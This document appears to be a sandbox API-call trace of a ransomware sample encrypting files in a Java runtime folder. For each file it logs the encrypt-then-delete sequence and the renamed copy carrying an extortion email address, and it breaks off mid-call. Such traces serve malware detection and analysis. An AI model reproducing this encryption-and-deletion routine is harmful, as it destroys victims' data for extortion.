[0151.048] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.cpl")) returned 0x20 [0151.048] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.cpl.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.048] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.cpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0151.048] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0151.048] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0151.048] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.cpl.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0151.048] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2e70) returned 1 [0151.048] CryptSetKeyParam (hKey=0xac2e70, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.048] ReadFile (in: hFile=0x2e0, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x2dc00, lpOverlapped=0x0) returned 1 [0151.053] CryptEncrypt (in: hKey=0xac2e70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x2dc10, dwBufLen=0x2dc10 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x2dc10) returned 1 [0151.053] WriteFile (in: hFile=0x2ec, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x2dc10, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x2dc10, lpOverlapped=0x0) returned 1 [0151.056] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2d70) returned 1 [0151.056] CryptSetKeyParam (hKey=0xac2d70, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.056] CryptEncrypt (in: hKey=0xac2d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0151.056] CryptDestroyKey (hKey=0xac2d70) returned 1 [0151.056] WriteFile (in: hFile=0x2ec, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0151.056] CryptDestroyKey (hKey=0xac2e70) returned 1 [0151.056] CloseHandle (hObject=0x2e0) returned 1 [0151.057] CloseHandle (hObject=0x2ec) returned 1 [0151.057] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.cpl")) returned 1 [0151.059] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0151.059] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0151.059] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=80448) returned 1 [0151.059] CloseHandle (hObject=0x2ec) returned 1 [0151.063] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.exe")) returned 0x20 [0151.063] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.063] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0151.063] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0151.063] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0151.063] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0151.063] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2d70) returned 1 [0151.063] CryptSetKeyParam (hKey=0xac2d70, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.063] ReadFile (in: hFile=0x2ec, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x13a40, lpOverlapped=0x0) returned 1 [0151.066] CryptEncrypt (in: hKey=0xac2d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x13a50, dwBufLen=0x13a50 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x13a50) returned 1 [0151.066] WriteFile (in: hFile=0x2e0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x13a50, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x13a50, lpOverlapped=0x0) returned 1 [0151.068] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac33f0) returned 1 [0151.068] CryptSetKeyParam (hKey=0xac33f0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.068] CryptEncrypt (in: hKey=0xac33f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0151.068] CryptDestroyKey (hKey=0xac33f0) returned 1 [0151.068] WriteFile (in: hFile=0x2e0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0151.068] CryptDestroyKey (hKey=0xac2d70) returned 1 [0151.068] CloseHandle (hObject=0x2ec) returned 1 [0151.068] CloseHandle (hObject=0x2e0) returned 1 [0151.069] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.exe")) returned 1 [0151.071] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0151.071] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_font.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0151.071] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=69184) returned 1 [0151.071] CloseHandle (hObject=0x2e0) returned 1 [0151.071] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_font.dll")) returned 0x20 [0151.072] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_font.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.072] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_font.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0151.072] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0151.072] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0151.072] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_font.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0151.072] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac3130) returned 1 [0151.072] CryptSetKeyParam (hKey=0xac3130, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.072] ReadFile (in: hFile=0x2e0, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x10e40, lpOverlapped=0x0) returned 1 [0151.074] CryptEncrypt (in: hKey=0xac3130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x10e50, dwBufLen=0x10e50 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x10e50) returned 1 [0151.075] WriteFile (in: hFile=0x2ec, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x10e50, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x10e50, lpOverlapped=0x0) returned 1 [0151.076] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac3330) returned 1 [0151.076] CryptSetKeyParam (hKey=0xac3330, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.076] CryptEncrypt (in: hKey=0xac3330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0151.076] CryptDestroyKey (hKey=0xac3330) returned 1 [0151.076] WriteFile (in: hFile=0x2ec, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0151.077] CryptDestroyKey (hKey=0xac3130) returned 1 [0151.077] CloseHandle (hObject=0x2e0) returned 1 [0151.077] CloseHandle (hObject=0x2ec) returned 1 [0151.077] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_font.dll")) returned 1 [0151.078] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0151.078] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0151.078] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=538176) returned 1 [0151.078] CloseHandle (hObject=0x2ec) returned 1 [0151.078] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll")) returned 0x20 [0151.079] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.079] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0151.079] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0151.079] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0151.079] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0151.079] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac3130) returned 1 [0151.079] CryptSetKeyParam (hKey=0xac3130, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.079] ReadFile (in: hFile=0x2ec, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x83640, lpOverlapped=0x0) returned 1 [0151.275] CryptEncrypt (in: hKey=0xac3130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x83650, dwBufLen=0x83650 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x83650) returned 1 [0151.276] WriteFile (in: hFile=0x2e0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x83650, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x83650, lpOverlapped=0x0) returned 1 [0151.286] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac31b0) returned 1 [0151.286] CryptSetKeyParam (hKey=0xac31b0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.286] CryptEncrypt (in: hKey=0xac31b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x50, dwBufLen=0x50 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x50) returned 1 [0151.286] CryptDestroyKey (hKey=0xac31b0) returned 1 [0151.286] WriteFile (in: hFile=0x2e0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x102, lpOverlapped=0x0) returned 1 [0151.286] CryptDestroyKey (hKey=0xac3130) returned 1 [0151.286] CloseHandle (hObject=0x2ec) returned 1 [0151.286] CloseHandle (hObject=0x2e0) returned 1 [0151.286] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll")) returned 1 [0151.291] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0151.291] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jawt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0151.292] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=14400) returned 1 [0151.292] CloseHandle (hObject=0x2e0) returned 1 [0151.292] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jawt.dll")) returned 0x20 [0151.292] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jawt.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.292] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jawt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0151.293] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0151.293] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0151.293] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jawt.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0151.293] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac3430) returned 1 [0151.293] CryptSetKeyParam (hKey=0xac3430, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.293] ReadFile (in: hFile=0x2e0, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x3840, lpOverlapped=0x0) returned 1 [0151.295] CryptEncrypt (in: hKey=0xac3430, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x3850, dwBufLen=0x3850 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x3850) returned 1 [0151.295] WriteFile (in: hFile=0x2ec, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x3850, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x3850, lpOverlapped=0x0) returned 1 [0151.296] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac34b0) returned 1 [0151.296] CryptSetKeyParam (hKey=0xac34b0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.296] CryptEncrypt (in: hKey=0xac34b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0151.296] CryptDestroyKey (hKey=0xac34b0) returned 1 [0151.296] WriteFile (in: hFile=0x2ec, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0151.296] CryptDestroyKey (hKey=0xac3430) returned 1 [0151.296] CloseHandle (hObject=0x2e0) returned 1 [0151.296] CloseHandle (hObject=0x2ec) returned 1 [0151.296] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jawt.dll")) returned 1 [0151.297] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0151.297] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jawtaccessbridge-64.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0151.298] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=15424) returned 1 [0151.298] CloseHandle (hObject=0x2ec) returned 1 [0151.298] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jawtaccessbridge-64.dll")) returned 0x20 [0151.298] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jawtaccessbridge-64.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.298] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jawtaccessbridge-64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0151.298] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0151.298] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0151.298] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jawtaccessbridge-64.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0151.298] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac3030) returned 1 [0151.298] CryptSetKeyParam (hKey=0xac3030, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.298] ReadFile (in: hFile=0x2ec, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x3c40, lpOverlapped=0x0) returned 1 [0151.474] CryptEncrypt (in: hKey=0xac3030, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x3c50, dwBufLen=0x3c50 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x3c50) returned 1 [0151.474] WriteFile (in: hFile=0x2e0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x3c50, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x3c50, lpOverlapped=0x0) returned 1 [0151.476] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac3230) returned 1 [0151.476] CryptSetKeyParam (hKey=0xac3230, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.476] CryptEncrypt (in: hKey=0xac3230, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x50, dwBufLen=0x50 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x50) returned 1 [0151.476] CryptDestroyKey (hKey=0xac3230) returned 1 [0151.476] WriteFile (in: hFile=0x2e0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x102, lpOverlapped=0x0) returned 1 [0151.476] CryptDestroyKey (hKey=0xac3030) returned 1 [0151.476] CloseHandle (hObject=0x2ec) 